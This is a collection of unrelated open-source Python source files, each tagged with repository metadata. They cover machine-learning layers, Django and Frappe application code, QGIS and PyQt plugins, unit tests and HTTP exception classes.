moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
training: Either a Python boolean, or a TensorFlow boolean scalar tensor
(e.g. a placeholder). Whether to return the output in training mode
(normalized with statistics of the current batch) or in inference mode
(normalized with moving statistics).
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: String, the name of the layer.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
Output tensor.
"""
layer = BatchNormalization(
axis=axis,
momentum=momentum,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
trainable=trainable,
name=name,
_reuse=reuse,
_scope=name)
return layer.apply(inputs, training=training)
# Aliases
BatchNorm = BatchNormalization
batch_norm = batch_normalization
| anilmuthineni/tensorflow | tensorflow/python/layers/normalization.py | Python | apache-2.0 | 13,621 |
try:
from urlparse import urlparse, parse_qs
except ImportError:
from urllib.parse import urlparse, parse_qs
from oauthlib.common import add_params_to_uri
def slack_compliance_fix(session):
def _non_compliant_param_name(url, headers, data):
# If the user has already specified the token, either in the URL
# or in a data dictionary, then there's nothing to do.
# If the specified token is different from ``session.access_token``,
# we assume the user intends to override the access token.
url_query = dict(parse_qs(urlparse(url).query))
token = url_query.get("token")
if not token and isinstance(data, dict):
token = data.get("token")
if token:
# Nothing to do, just return.
return url, headers, data
if not data:
data = {"token": session.access_token}
elif isinstance(data, dict):
data["token"] = session.access_token
else:
# ``data`` is something other than a dict: maybe a stream,
# maybe a file object, maybe something else. We can't easily
# modify it, so we'll set the token by modifying the URL instead.
token = [("token", session.access_token)]
url = add_params_to_uri(url, token)
return url, headers, data
session.register_compliance_hook("protected_request", _non_compliant_param_name)
return session
| singingwolfboy/requests-oauthlib | requests_oauthlib/compliance_fixes/slack.py | Python | isc | 1,453 |
import random
import urllib
from os import path, makedirs
from faker import Faker
from django.conf import settings # import the settings file
from django.core.management.base import BaseCommand
from Lagerregal import utils
from devices.models import Building, Room, Manufacturer, Device, Picture, Lending
from devicegroups.models import Devicegroup
from devicetypes.models import Type
from locations.models import Section
from users.models import Lageruser, Department, DepartmentUser
fake = Faker('de_DE')
def fake_building(word):
return Building(
name=word.title(),
street=fake.street_name(),
number=fake.random.randint(1, 200),
zipcode=fake.postcode(),
city=fake.city(),
state=fake.state(),
country=fake.country()
)
def fake_section(word):
return Section(name=word.title())
def fake_room(word):
return Room(
name=word.title(),
building=Building.objects.order_by('?').first(),
section=Section.objects.order_by('?').first()
)
def fake_manufacturer():
return Manufacturer(name=fake.company())
def fake_department(word):
return Department(name=word.title())
def fake_lageruser(word):
return Lageruser(
main_department=Department.objects.order_by('?').first(),
username=word,
first_name=fake.first_name(),
last_name=fake.last_name()
)
def fake_devicetype(word):
return Type(name=word.title())
def fake_devicegroup(word):
return Devicegroup(
name=word.title(),
department=Department.objects.order_by('?').first()
)
def fake_device(inventorynumber, word):
return Device(
created_at=fake.past_date(start_date="-600d"),
creator=Lageruser.objects.order_by('?').first(),
name=word.title(),
inventorynumber=inventorynumber,
serialnumber=random.randint(1, 1000),
manufacturer=Manufacturer.objects.order_by('?').first(),
devicetype=Type.objects.order_by('?').first(),
room=Room.objects.order_by('?').first(),
group=Devicegroup.objects.order_by('?').first(),
department=Department.objects.order_by('?').first()
)
def fake_lending(device, user):
lending = Lending(
owner=user,
lenddate=fake.date_between(start_date='-100d', end_date='-50d')
)
if random.randint(0, 100) > 75:
lending.duedate = fake.future_date(end_date='+50d')
else:
lending.returndate = fake.date_between(start_date='-50d', end_date='today')
if random.randint(0, 100) > 80:
lending.smalldevice = fake.word()
else:
lending.device = device
return lending
def generate_buildings(number):
print("Generating buildings")
word_list = fake.words(number, unique=True)
Building.objects.bulk_create(fake_building(word) for word in word_list)
def generate_sections(number):
print("Generating sections")
word_list = fake.words(number, unique=True)
Section.objects.bulk_create(fake_section(word) for word in word_list)
def generate_rooms(number):
print("Generating rooms")
word_list = fake.words(number, unique=True)
Room.objects.bulk_create(fake_room(word) for word in word_list)
def generate_manufacturers(number):
print("Generating manufacturers")
Manufacturer.objects.bulk_create(fake_manufacturer() for i in range(number))
def generate_departments(number):
print("Generating departments")
word_list = fake.words(number, unique=True)
Department.objects.bulk_create(fake_department(word) for word in word_list)
def generate_lagerusers(number):
print("Generating lagerusers")
word_list = fake.words(number, unique=True)
Lageruser.objects.bulk_create(fake_lageruser(word) for word in word_list)
def generate_department_users():
print("Generating departmentusers")
users = Lageruser.objects.all()
for user in users:
if user.main_department:
DepartmentUser.objects.create(user=user, department=user.main_department)
def generate_devicetypes(number):
print("Generating devicetypes")
word_list = fake.words(number, unique=True)
Type.objects.bulk_create(fake_devicetype(word) for word in word_list)
def generate_devicegroups(number):
print("Generating devicegroups")
word_list = fake.words(number, unique=True)
Devicegroup.objects.bulk_create(fake_devicegroup(word) for word in word_list)
def generate_devices(number):
print("Generating devices")
inventorynumber_list = random.sample(range(0, 5000), number)
word_list = fake.words(number, unique=True)
Device.objects.bulk_create(fake_device(inventorynumber_list[i], word_list[i]) for i in range(number))
def generate_lendings(number):
print("Generating lendings")
devices = random.sample(list(Device.objects.all()), number)
users = random.sample(list(Lageruser.objects.all()), number)
for i in range(number):
lending = fake_lending(devices[i], users[i])
lending.save()
if lending.device:
devices[i].currentlending = lending
devices[i].save()
def generate_pictures(number):
"""
Every device gets one picture, but we only download a few unique images and
recycle after that. Try to be as dynamic as possible and share state through
settings.PRODUCTION with get_file_location so we do not get a uuid
every time we save a fake image.
"""
print("Generating pictures")
devices = Device.objects.all()
img_root = path.join(settings.MEDIA_ROOT, utils.get_file_location(Picture()))
for i in range(number):
img_path = path.join(img_root, 'dev_{:03}.png'.format(i))
if not path.exists(img_path):
makedirs(path.dirname(img_path), exist_ok=True)
urllib.request.urlretrieve("https://lorempixel.com/640/480/technics", img_path)
for index, device in enumerate(devices):
pic = Picture(device=device)
# recycle images after <number> uses
pic.image = utils.get_file_location(pic, 'dev_{:03}.png'.format(index % number))
pic.save()
class Command(BaseCommand):
help = 'Populate database with sample data.'
err = SystemExit("can't create sample data in production mode")
try:
if settings.PRODUCTION:
raise err
except AttributeError:
raise err
def handle(self, *args, **options):
if Building.objects.exists():
print("It looks like your database already contains objects. Skipping…")
else:
generate_buildings(20)
generate_sections(20)
generate_rooms(20)
generate_manufacturers(5)
generate_departments(5)
generate_lagerusers(50)
generate_department_users()
generate_devicetypes(10)
generate_devicegroups(10)
generate_devices(150)
generate_lendings(30)
generate_pictures(20)
admin = Lageruser.objects.create_superuser('admin', 'admin@localhost', 'admin')
for department in Department.objects.all():
DepartmentUser.objects.create(user=admin, department=department)
| vIiRuS/Lagerregal | main/management/commands/populate.py | Python | bsd-3-clause | 7,197 |
__author__ = 'zhu'
| epokmedia/redmine-cli | redminecli/server/__init__.py | Python | mit | 19 |
# -*- coding: utf-8 -*-
import re
from django.core.management.base import NoArgsCommand, BaseCommand
# import commonware.log
# log = commonware.log.getLogger('bedrock')
from bedrock.mocotw.utils import newsletter_subscribe
email_re = re.compile('^[_A-z0-9-]+(\.[_A-z0-9-]+)*@[A-z0-9-]+(\.[A-z0-9-]+)*(\.[A-z]{2,4})$')
class Command(BaseCommand):
help = 'Import subscriptions to Database.'
option_list = NoArgsCommand.option_list
def handle(self, *args, **options):
self.options = options
filename = 'offline-subscriptions.txt'
if args and len(args) > 0:
filename = args[0]
with open(filename, 'r') as file:
subscriptions = file.readlines()
count = 0
for subscription in subscriptions:
email = subscription.strip()
if email_re.match(email):
result = newsletter_subscribe(email)
count += 1 if result else 0
# file.write(subscription.u_email + '\n')
file.close()
print '%d new subscriptions.' % count
| elin-moco/bedrock | bedrock/mocotw/management/commands/import_subscriptions.py | Python | mpl-2.0 | 1,106 |
"""
byceps.services.ticketing.category_service
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from typing import Dict, Optional, Sequence
from ...database import db
from ...typing import PartyID
from .models.category import Category as DbCategory
from .models.ticket import Ticket as DbTicket
from .transfer.models import TicketCategory, TicketCategoryID
def create_category(party_id: PartyID, title: str) -> TicketCategory:
"""Create a category."""
category = DbCategory(party_id, title)
db.session.add(category)
db.session.commit()
return _db_entity_to_category(category)
def count_categories_for_party(party_id: PartyID) -> int:
"""Return the number of categories for that party."""
return DbCategory.query \
.for_party(party_id) \
.count()
def find_category(category_id: TicketCategoryID) -> Optional[TicketCategory]:
"""Return the category with that ID, or `None` if not found."""
category = DbCategory.query.get(category_id)
return _db_entity_to_category(category)
def get_categories_for_party(party_id: PartyID) -> Sequence[TicketCategory]:
"""Return all categories for that party."""
categories = DbCategory.query \
.for_party(party_id) \
.all()
return [_db_entity_to_category(category) for category in categories]
def get_categories_with_ticket_counts_for_party(
party_id: PartyID
) -> Dict[TicketCategory, int]:
"""Return all categories with ticket counts for that party."""
category = db.aliased(DbCategory)
subquery = db.session \
.query(
db.func.count(DbTicket.id)
) \
.join(DbCategory) \
.filter(DbCategory.id == category.id) \
.filter(DbTicket.revoked == False) \
.subquery() \
.as_scalar()
rows = db.session \
.query(
category,
subquery
) \
.filter(category.party_id == party_id) \
.group_by(category.id) \
.all()
return {
_db_entity_to_category(category): ticket_count
for category, ticket_count in rows
}
def _db_entity_to_category(category: DbCategory) -> TicketCategory:
return TicketCategory(
category.id,
category.party_id,
category.title,
)
| m-ober/byceps | byceps/services/ticketing/category_service.py | Python | bsd-3-clause | 2,371 |
import copy
from threading import Lock
import uuid
from naman.core.pypelib.persistence import PersistenceEngine
from naman.core.pypelib.resolver.Resolver import Resolver
from naman.core.pypelib.utils import Logger
from naman.core.pypelib.parsing.ParseEngine import ParseEngine
try:
import cPickle as pickle
except:
import pickle
'''
@author: msune,lbergesio,omoya,cbermudo,CarolinaFernandez
@organization: i2CAT, OFELIA FP7
PolicyEngine RuleTable class
Encapsulates logic of a simple Rule Table
'''
from naman.core.pypelib.Rule import TerminalMatch
from naman.core.pypelib.utils.Exceptions import *
class RuleEntry():
rule = None
enabled = True
def __init__(self,rule, enabled=True):
self.rule = rule
self.enabled = enabled
class RuleTable():
logger = Logger.getLogger()
uuid=None
name=None
_persist = None
_parser = None
_persistenceBackend = None
_persistenceBackendParameters=None
#Default table policy
_policy = None
_ruleSet = None
_mappings = None
_mutex = None
_resolver = None
#Constructor
def __init__(self,name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType = False, uuid = None,**kwargs):
if not isinstance(pType,bool):
raise Exception("Unknown default table policy")
self.uuid = uuid
self.name = name
self._mutex = Lock()
self._policy = pType
self._parser = defaultParser
self._persistenceBackend = defaultPersistence
self._persist = defaultPersistenceFlag
self._mappings = resolverMappings
self._ruleSet = list()
self._persistenceBackendParameters = kwargs
if self._persist:
self.save(self._persistenceBackend,**kwargs)
#Generate the resolver
self._resolver = Resolver(resolverMappings)
#Deep copy
def clone(self):
#XXX: in principle mutex is not needed since methods calling clone() are already protected
#with self._mutex:
cpTable = RuleTable(self.name,None,self._parser,self._persistenceBackend, False,self._policy,self.uuid, **self._persistenceBackendParameters)
cpTable._mutex = None
cpTable._persist = copy.deepcopy(self._persist)
cpTable._ruleSet = copy.deepcopy(self._ruleSet)
cpTable._resolver = None
return cpTable
#Determine rule position
def _getRuleIndex(self, rule):
for it in self._ruleSet:
if it.rule == rule:
return self._ruleSet.index(it)
return None
def getRule(self, index):
return self._ruleSet[index].rule
#Add, move and remove rule
def addRule(self,string,enabled=True,pos=None,parser=None,pBackend=None,persist=True):
if not parser:
parser = self._parser
rule = ParseEngine.parseRule(string, parser)
rule.setUUID(uuid.uuid4().hex)
with self._mutex:
if pos > len(self._ruleSet):
#raise Exception("Invalid position")
self._ruleSet.append(RuleEntry(rule,enabled))
elif pos !=None:
self._ruleSet.insert(pos,RuleEntry(rule,enabled))
else:
self._ruleSet.append(RuleEntry(rule,enabled))
if self._persist:
self.save()
def removeRule(self,rule=None, index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to remove; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet.pop(index)
if self._persist:
self.save()
def moveRule(self, newIndex, rule=None, index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to move; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet.insert(newIndex, self._ruleSet.pop(index))
if self._persist:
self.save()
def _modEnableRule(self, enable, rule=None,index=None):
if (not rule) and (index == None):
raise Exception("Unable to determine which rule to enable; you must specify either the rule or the index")
with self._mutex:
if index == None:
index = self._getRuleIndex(rule)
if index == None:
raise Exception("Unable to find rule in the ruleSet")
self._ruleSet[index].enabled = enable
if self._persist:
self.save()
def enableRule(self, rule=None, index=None):
return self._modEnableRule(True,rule,index)
def disableRule(self, rule=None, index= None):
return self._modEnableRule(False,rule,index)
def setPolicy(self, policy):
if not isinstance(policy,bool):
raise Exception("Unknown default table policy")
with self._mutex:
self._policy = policy
if self._persist:
self.save()
def setParser(self, parser):
with self._mutex:
self._parser = parser
if self._persist:
self.save()
def setPersistenceBackend(self, persistenceBackend):
with self._mutex:
self._persistenceBackend = persistenceBackend
if self._persist:
self.save()
def setPersistenceFlag(self, persistenceFlag):
with self._mutex:
self._persist = persistenceFlag
if self._persist:
self.save()
def setMappings(self, mappings):
with self._mutex:
self._mappings = mappings
if self._persist:
self.save()
def dump(self):
print "Table: "+self.name+" UUID: "+str(self.uuid)
print "NUmber of rules: "+str(len(self._ruleSet))
with self._mutex:
i=0
for it in self._ruleSet:
print "[%s]:"%i +it.rule.dump()+ " Enabled: "+str(it.enabled)
i+=1
print "Default policy: "+str(self._policy)
#Go through the table
def evaluate(self,metaObj):
#Iterate over ruleset
with self._mutex:
for it in self._ruleSet:
if it.enabled:
try:
it.rule.evaluate(metaObj,self._resolver)
except TerminalMatch as terminal:
if terminal.value:
return True
else:
raise terminal
if self._policy:
return self._policy
else:
raise Exception("Policy verification failed. Policy type is DENY")
def save(self, pBackend=None,**kwargs):
if not pBackend:
pBackend = self._persistenceBackend
if not kwargs:
kwargs2 = self._persistenceBackendParameters
else:
kwargs2 = kwargs
PersistenceEngine.save(self,pBackend,**kwargs2)
#In general should not be called, use loadOrGenerate instead
@staticmethod
def load(name, resolverMappings, pBackend, **kwargs):
return PersistenceEngine.load(name,pBackend,resolverMappings,**kwargs)
@staticmethod
def loadOrGenerate(name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType=False, uuid=None,**kwargs):
try:
return PersistenceEngine.load(name,defaultPersistence, resolverMappings, defaultParser,**kwargs)
except ZeroPolicyObjectsReturned:
RuleTable.logger.warning("Unable to load RuleTable, generating a new one")
return RuleTable(name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType, uuid,**kwargs)
except MultiplePolicyObjectsReturned:
RuleTable.logger.warning("Unable to load a single RuleTable, asking the user")
raise MultiplePolicyObjectsReturned
except Exception as e:
RuleTable.logger.error("Unable to load RuleTable. Exception: %s" % str(e))
'''
Retrieves every Engine's PolicyRuleTable object for a given name.
This method should be seldom used.
'''
@staticmethod
def loadAll(name, defaultPersistence):
return PersistenceEngine.loadAll(name, defaultPersistence)
'''
Deletes a Engine's PolicyRuleTable object for a given ID.
This method should be seldom used.
'''
@staticmethod
def delete(tableID, defaultPersistence):
return PersistenceEngine.delete(tableID, defaultPersistence)
#Getters
def getRuleSet(self):
return self._ruleSet
def getName(self):
return self.name
def getPolicyType(self):
return self._policy
def getPersistence(self):
return self._persistenceBackend
def getParser(self):
return self._parser
def getResolverMappings(self):
return self._mappings
def getPersistenceFlag(self):
return self._persist
| jpardobl/naman | naman/core/pypelib/RuleTable.py | Python | bsd-3-clause | 8,323 |
import unittest
from python_digits import HexDigit
class TestHexDigits(unittest.TestCase):
def test_hd_instantiate(self):
d = HexDigit(0x1)
self.assertEqual(d, 0x1)
def test_hd_instantiate_f(self):
d = HexDigit(0xf)
self.assertEqual(d, 0xf)
def test_hd_instantiate_int(self):
d = HexDigit(5)
self.assertEqual(d, 0x5)
def test_hd_instantiate_str(self):
d = HexDigit("0x5")
self.assertEqual(d, 0x5)
def test_hd_string_value(self):
d = HexDigit("f")
self.assertEqual(d, 0xf)
def test_hd_bad_hexstr(self):
with self.assertRaises(ValueError):
d = HexDigit('0xh')
def test_hd_too_high(self):
with self.assertRaises(ValueError):
d = HexDigit(0xf2)
def test_hd_too_low(self):
with self.assertRaises(ValueError):
d = HexDigit(-2)
def test_hd_no_value(self):
with self.assertRaises(TypeError):
d = HexDigit()
def test_hd_acts_as_int(self):
d1 = HexDigit(0xf)
d2 = HexDigit(4)
self.assertEqual(d1 * d2, 60)
| dsandersAzure/python_digits | python_digits/tests/TestHexDigit.py | Python | apache-2.0 | 1,131 |
from unittest import TestCase
import pygame
from ..config import BRICK_IMAGES, START_LEVEL, BLIP
from .. import asset
class TestAsset(TestCase):
def setUp(self):
pygame.init()
def test_load_image(self):
img = asset.load_image(BRICK_IMAGES['red'])
self.assertTrue(False)
def test_load_sound(self):
snd = asset.load(BLIP)
self.assertTrue(False)
def test_load_level(self):
level = asset.load_level(START_LEVEL)
self.assertIn('name', level)
self.assertIn('ball_speed', level)
self.assertIn('next', level)
self.assertIn('bricks', level)
self.assertEqual(10, len(level['bricks']))
for row in level['bricks']:
self.assertEqual(10, len(row))
for row in level['bricks']:
for color in row:
self.assertIn(color, BRICK_IMAGES)
def test_save_level(self):
self.assertTrue(False)
def tearDown(self):
pygame.quit()
| Oisota/Breakout | breakout/tests/test_asset.py | Python | gpl-3.0 | 994 |
import _plotly_utils.basevalidators
class ArrayValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(self, plotly_name="array", parent_name="bar.error_x", **kwargs):
super(ArrayValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "data"),
**kwargs
)
| plotly/python-api | packages/python/plotly/plotly/validators/bar/error_x/_array.py | Python | mit | 442 |
class InvalidTracebackError(Exception):
def __init__(self, linenum=-1):
self.linenum = linenum
super(self.__class__, self).__init__()
def __str__(self):
details = ": at line %d" % self.linenum if self.linenum > 0 else ""
return "InvalidTracebackError" + details
| kde713/python-tbparser | tbparser/exceptions.py | Python | apache-2.0 | 303 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
slopearea_multi.py
---------------------
Date : March 2015
Copyright : (C) 2015 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'March 2015'
__copyright__ = '(C) 2015, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import QIcon
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.GeoAlgorithmExecutionException import \
GeoAlgorithmExecutionException
from processing.core.parameters import ParameterFile
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputDirectory
from TauDEMUtils import TauDEMUtils
class SlopeAreaMulti(GeoAlgorithm):
SLOPE_GRID = 'SLOPE_GRID'
AREA_GRID = 'AREA_GRID'
SLOPE_EXPONENT = 'SLOPE_EXPONENT'
AREA_EXPONENT = 'AREA_EXPONENT'
SLOPE_AREA_GRID = 'SLOPE_AREA_GRID'
def getIcon(self):
return QIcon(os.path.dirname(__file__) + '/../../images/taudem.png')
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Slope Area Combination (multifile)')
self.cmdName = 'slopearea'
self.group, self.i18n_group = self.trAlgorithm('Stream Network Analysis tools')
self.addParameter(ParameterFile(self.SLOPE_GRID,
self.tr('Slope Grid'), True, False))
self.addParameter(ParameterFile(self.AREA_GRID,
self.tr('Contributing Area Grid'), True, False))
self.addParameter(ParameterNumber(self.SLOPE_EXPONENT,
self.tr('Slope Exponent'), 0, None, 2))
self.addParameter(ParameterNumber(self.AREA_EXPONENT,
self.tr('Area Exponent'), 0, None, 1))
self.addOutput(OutputDirectory(self.SLOPE_AREA_GRID,
self.tr('Slope Area Grid')))
def processAlgorithm(self, progress):
commands = []
commands.append(os.path.join(TauDEMUtils.mpiexecPath(), 'mpiexec'))
processNum = ProcessingConfig.getSetting(TauDEMUtils.MPI_PROCESSES)
if processNum <= 0:
raise GeoAlgorithmExecutionException(
self.tr('Wrong number of MPI processes used. Please set '
'correct number before running TauDEM algorithms.'))
commands.append('-n')
commands.append(unicode(processNum))
commands.append(os.path.join(TauDEMUtils.taudemMultifilePath(), self.cmdName))
commands.append('-slp')
commands.append(self.getParameterValue(self.SLOPE_GRID))
commands.append('-sca')
commands.append(self.getParameterValue(self.AREA_GRID))
commands.append('-par')
commands.append(unicode(self.getParameterValue(self.SLOPE_EXPONENT)))
commands.append(unicode(self.getParameterValue(self.AREA_EXPONENT)))
commands.append('-sa')
commands.append(self.getOutputValue(self.SLOPE_AREA_GRID))
TauDEMUtils.executeTauDEM(commands, progress)
| siliconsmiley/QGIS | python/plugins/processing/algs/taudem/slopearea_multi.py | Python | gpl-2.0 | 3,833 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MyUI/MyWidgetUI.ui'
#
# Created: Tue Apr 1 09:44:10 2014
# by: PyQt4 UI code generator 4.10.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(400, 300)
self.horizontalLayoutWidget = QtGui.QWidget(Form)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(59, 29, 191, 211))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setMargin(0)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.lineEdit = QtGui.QLineEdit(self.horizontalLayoutWidget)
self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
self.horizontalLayout.addWidget(self.lineEdit)
self.pushButton = QtGui.QPushButton(self.horizontalLayoutWidget)
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.horizontalLayout.addWidget(self.pushButton)
self.actionPrintText = QtGui.QAction(Form)
self.actionPrintText.setObjectName(_fromUtf8("actionPrintText"))
self.retranslateUi(Form)
QtCore.QObject.connect(self.pushButton, QtCore.SIGNAL(_fromUtf8("clicked()")), self.actionPrintText.trigger)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Form", None))
self.pushButton.setText(_translate("Form", "PushButton", None))
self.actionPrintText.setText(_translate("Form", "PrintText", None))
| DTUWindEnergy/Python4WindEnergy | lesson 6/results/ebra/MyUI/MyWidgetUI.py | Python | apache-2.0 | 2,193 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.desk.notifications import delete_notification_count_for
from frappe.core.doctype.user.user import STANDARD_USERS
from frappe.utils import cint
from frappe import _
@frappe.whitelist()
def get_list(arg=None):
"""get list of messages"""
frappe.form_dict['start'] = int(frappe.form_dict['start'])
frappe.form_dict['page_length'] = int(frappe.form_dict['page_length'])
frappe.form_dict['user'] = frappe.session['user']
# set all messages as read
frappe.db.sql("""UPDATE `tabCommunication` set seen = 1
where
communication_type in ('Chat', 'Notification')
and seen = 0
and reference_doctype = 'User'
and reference_name = %s""", frappe.session.user)
delete_notification_count_for("Chat")
frappe.local.flags.commit = True
fields = '''name, owner, modified, content, communication_type,
comment_type, reference_doctype, reference_name'''
if frappe.form_dict.contact == 'Bot':
return frappe.db.sql("""select {0} from `tabCommunication`
where
comment_type = 'Bot'
and reference_doctype = 'User'
and reference_name = %(user)s
order by creation desc
limit %(start)s, %(page_length)s""".format(fields),
frappe.local.form_dict, as_dict=1)
if frappe.form_dict.contact == frappe.session.user:
# return messages
return frappe.db.sql("""select {0} from `tabCommunication`
where
communication_type in ('Chat', 'Notification')
and comment_type != 'Bot'
and reference_doctype ='User'
and (owner=%(contact)s
or reference_name=%(user)s
or owner=reference_name)
order by creation desc
limit %(start)s, %(page_length)s""".format(fields),
frappe.local.form_dict, as_dict=1)
else:
return frappe.db.sql("""select {0} from `tabCommunication`
where
communication_type in ('Chat', 'Notification')
and comment_type != 'Bot'
and reference_doctype ='User'
and ((owner=%(contact)s and reference_name=%(user)s)
or (owner=%(user)s and reference_name=%(contact)s))
order by creation desc
limit %(start)s, %(page_length)s""".format(fields),
frappe.local.form_dict, as_dict=1)
@frappe.whitelist()
def get_active_users():
data = frappe.db.sql("""select name,
(select count(*) from tabSessions where user=tabUser.name
and timediff(now(), lastupdate) < time("01:00:00")) as has_session
from tabUser
where enabled=1 and
ifnull(user_type, '')!='Website User' and
name not in ({})
order by first_name""".format(", ".join(["%s"]*len(STANDARD_USERS))), STANDARD_USERS, as_dict=1)
# make sure current user is at the top, using has_session = 100
users = [d.name for d in data]
if frappe.session.user in users:
data[users.index(frappe.session.user)]["has_session"] = 100
else:
# in case of administrator
data.append({"name": frappe.session.user, "has_session": 100})
if 'System Manager' in frappe.get_roles():
data.append({"name": "Bot", "has_session": 100})
return data
@frappe.whitelist()
def post(txt, contact, parenttype=None, notify=False, subject=None):
"""post message"""
comment_type = None
if contact == 'Bot':
contact = frappe.session.user
comment_type = 'Bot'
d = frappe.new_doc('Communication')
d.communication_type = 'Notification' if parenttype else 'Chat'
d.subject = subject
d.content = txt
d.reference_doctype = 'User'
d.reference_name = contact
d.sender = frappe.session.user
if comment_type:
d.comment_type = comment_type
d.insert(ignore_permissions=True)
delete_notification_count_for("Chat")
if notify and cint(notify):
_notify(contact, txt, subject)
return d
@frappe.whitelist()
def delete(arg=None):
frappe.get_doc("Communication", frappe.form_dict['name']).delete()
def _notify(contact, txt, subject=None):
from frappe.utils import get_fullname, get_url
try:
if not isinstance(contact, list):
contact = [frappe.db.get_value("User", contact, "email") or contact]
frappe.sendmail(\
recipients=contact,
sender= frappe.db.get_value("User", frappe.session.user, "email"),
subject=subject or _("New Message from {0}").format(get_fullname(frappe.session.user)),
template="new_message",
args={
"from": get_fullname(frappe.session.user),
"message": txt,
"link": get_url()
},
header=[_('New Message'), 'orange'])
except frappe.OutgoingEmailError:
pass
| mbauskar/frappe | frappe/desk/page/chat/chat.py | Python | mit | 4,437 |
# -*- coding: utf-8 -*-
class HTTPException( Exception ):
"""
Base-Class for all Exceptions that should match to an http error-code
"""
def __init__( self, status, name, descr ):
"""
:param status: The desired http error-code (404, 500, ...)
:type status: int
:param name: Name as of RFC 2616
:type name: str
:param descr: Human-readable description of that error
:type descr: str
"""
super(HTTPException, self).__init__()
self.status = status
self.name = name
self.descr = descr
def process( self ):
pass
class BadRequest( HTTPException ):
"""
BadRequest
Not used inside the server
"""
def __init__( self, descr="The request your browser sent cannot be fulfilled due to bad syntax." ):
super( BadRequest, self ).__init__( status=400, name = "Bad Request", descr=descr )
class Redirect( HTTPException ):
"""
Causes an 303 - See Other (or 302 - Found if requested / 301 - Moved Permanently) redirect
"""
def __init__( self, url, descr="Redirect", status=303 ):
super( Redirect, self ).__init__( status=303, name = "Redirect", descr=descr )
self.url = url
class Unauthorized( HTTPException ):
"""
Unauthorized
Raised whenever a request hits an path protected by canAccess() or a canAdd/canEdit/... -Function inside
an application returns false.
"""
def __init__( self, descr="The resource is protected and you don't have the permissions." ):
super( Unauthorized, self ).__init__( status=401, name = "Unauthorized", descr=descr )
class PaymentRequired( HTTPException ):
"""
PaymentRequired
Not used inside the server. This status-code is reserved for further use and is currently not
supported by clients.
"""
def __init__( self, descr="Payment Required" ):
super( PaymentRequired, self ).__init__( status=402, name = "Payment Required", descr=descr )
class Forbidden( HTTPException ):
"""
Forbidden
Not used inside the server. May be utilized in the future to distinguish between requests from
guests and users, who are logged in but don't have the permission.
"""
def __init__( self, descr="The resource is protected and you don't have the permissions." ):
super( Forbidden, self ).__init__( status=403, name = "Forbidden", descr=descr )
class NotFound( HTTPException ):
"""
NotFound
Usually raised in view() methods from application if the given key is invalid.
"""
def __init__( self, descr="The requested resource could not be found." ):
super( NotFound, self ).__init__( status=404, name = "Not Found", descr=descr )
class MethodNotAllowed( HTTPException ):
"""
MethodNotAllowed
Raised if a function is accessed which doesn't have the @exposed / @internalExposed decorator or
if the request arrived using get, but the function has the @forcePost flag.
"""
def __init__( self, descr="Method Not Allowed" ):
super( MethodNotAllowed, self ).__init__( status=405, name = "Method Not Allowed", descr=descr )
class NotAcceptable( HTTPException ):
"""
NotAcceptable
Signals that the parameters supplied doesn't match the function signature
"""
def __init__( self, descr="The request cannot be processed due to missing or invalid parameters." ):
